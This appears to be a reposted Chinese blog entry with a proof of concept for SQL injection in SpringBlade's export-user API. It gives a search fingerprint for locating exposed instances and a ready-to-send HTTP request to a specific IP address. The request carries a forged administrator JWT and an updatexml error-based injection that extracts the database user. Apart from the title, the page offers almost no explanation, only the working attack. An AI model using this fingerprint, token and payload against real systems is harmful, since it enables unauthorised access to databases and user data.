热门标签
热门文章
- 1股价飙升:AI PC大变革,联想的“联想时刻”正在缔造?
- 2植物大战僵尸杂交版 2.0.8 Mac畅玩详细教程_mac如何玩植物大战僵尸
- 3Flutter悬浮UI的设计Overlay组件_flutter 悬浮窗,view事件分发面试_flutter 浮层
- 4hbase实战_hbase实战项目
- 5【AI绘画发展史】AI绘画从历史到技术突破,何以突飞猛进?_人工智能绘画的发展
- 6vpn的搭建_server 10.8.0.0 255.255.255.0 #给客户端分配的地址池 push "ro
- 7牛客网(c++专项练习)_5、以下描述正确的是 a、虚函数是可以内联的,可以减少函数调用的开销提高效率 b、
- 8smartsvn smartgit 安装 及其破解_smartsvn smartgit
- 9期权的高风险体现在哪些方面?
- 10[C++]使用yolov8的onnx模型仅用opencv和bytetrack实现目标追踪_c++调用yolov8
当前位置: article > 正文
SpringBlade export-user SQL 注入漏洞_eyj0exaioijkv1qilcjhbgcioijiuzuxmij9.eyjpc3mioijpc
作者:一键难忘520 | 2024-06-20 09:21:23
赞
踩
eyj0exaioijkv1qilcjhbgcioijiuzuxmij9.eyjpc3mioijpc3n1c2vyiiwiyxvkijoiyxvkawv
指纹特征
body="https://bladex.vip"
- 1
漏洞复现
GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account=&realName=&1-updatexml(1,concat(0x7e,(select+user%28%29),0x7e),1)=1 HTTP/1.1
Host: 120.77.3.193:8069
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/一键难忘520/article/detail/739337
推荐阅读
相关标签
